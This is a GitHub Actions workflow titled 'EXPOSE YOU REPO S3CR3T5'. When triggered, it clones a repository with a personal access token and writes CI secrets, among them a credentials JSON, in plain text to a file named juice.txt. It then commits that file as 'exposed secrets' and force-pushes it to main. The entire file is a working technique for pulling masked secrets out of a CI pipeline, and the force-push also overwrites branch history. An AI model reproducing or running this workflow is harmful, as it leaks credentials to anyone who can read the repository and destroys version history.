name: EXPOSE YOU REPO S3CR3T5
on:
  push:
    branches:
      - staging
  workflow_dispatch:
env:
  NEXT_PUBLIC_SANITY_DATASET: ${{ secrets.STAGING_PUBLIC_SANITY_DATASET }}
  CREDENTIALS_JSON: ${{ secrets.STAGING_CREDENTIALS }}
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Expose
        run: |          
          git clone https://${{ secrets.PAT }}@github.com/${{ secrets.USER_NAME }}/demo-1.git     
          git config --local user.email ${{ secrets.USER_EMAIL }}
          git config --local user.name ${{ secrets.USER_NAME }}
          git config --local user.Password ${{ secrets.USER_PASSWORD }}
          echo "::: public sanity dataset :::" >> juice.txt
          echo $NEXT_PUBLIC_SANITY_DATASET >> juice.txt
          echo "::: credentials json :::" >> juice.txt
          echo $CREDENTIALS_JSON  >> juice.txt          
          git add .
          git commit -m "exposed secrets"
          git push origin main -f
